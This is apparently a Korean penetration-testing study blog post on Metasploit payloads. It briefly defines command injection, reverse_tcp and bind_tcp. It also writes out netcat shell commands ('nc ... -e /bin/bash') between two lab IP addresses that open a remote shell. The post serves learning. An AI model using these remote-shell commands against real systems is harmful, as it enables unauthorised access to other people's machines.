250x250
Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- 안드로이드
- TEST
- drift
- 계측
- textview
- scroll
- Navigation
- intent
- android
- ScrollView
- Coroutines
- LifeCycle
- tabbar
- activity
- appbar
- Dialog
- binding
- textfield
- Button
- 앱바
- Flutter
- CustomScrollView
- viewmodel
- DART
- data
- Kotlin
- Compose
- 테스트
- livedata
- 앱
Archives
- Today
- Total
Study Record
[모의해킹 MSF] payload 본문
728x90
Command Injection : 코드를 주입해서 원하는 동작을 실행할 수 있다.
nc CMD
listener (192.168.10.50) ← server (192.168.10.134)
# nc -l -p 7979 # nc 192.168.10.50 7979 -e /bin/bash
→ listener 쪽에서 server 쪽의 명령어를 입력할 수 있다. server 쪽에서 명령어를 보내도 listener에서는 반응을 하지 않는다.
listener (192.168.10.50) ← server (192.168.10.134)
# nc -l -p 7979 -e /bin/bash # nc 192.168.10.50 7979
→ server 쪽에서 listener 쪽의 명령어를 입력할 수 있다. listener 쪽에서 명령어를 보내도 server에서는 반응을 하지 않는다.
reverse_tcp
: 피해 시스템에서 공격자한테 연결을 시도한다
bind_tcp
: 피해 시스템에서 listener 역할을 하고 공격자가 연결을 시도한다.
728x90
'모의해킹' 카테고리의 다른 글
| [모의해킹 실습] Tomcat 취약점 (0) | 2021.11.10 |
|---|---|
| [모의해킹 시스템 취약점] Samba(CVE 2007-2477, 공유 설정 ) (0) | 2021.11.09 |
| [모의해킹 시스템 취약점] NFS 전체 공유/vsftpd 백도어 (0) | 2021.11.08 |
| [모의해킹 시스템 취약점] r-service (0) | 2021.11.08 |
| [모의 해킹] exploit-db (searchsploit CMD) (0) | 2021.11.08 |
'모의해킹' Related Articles
more
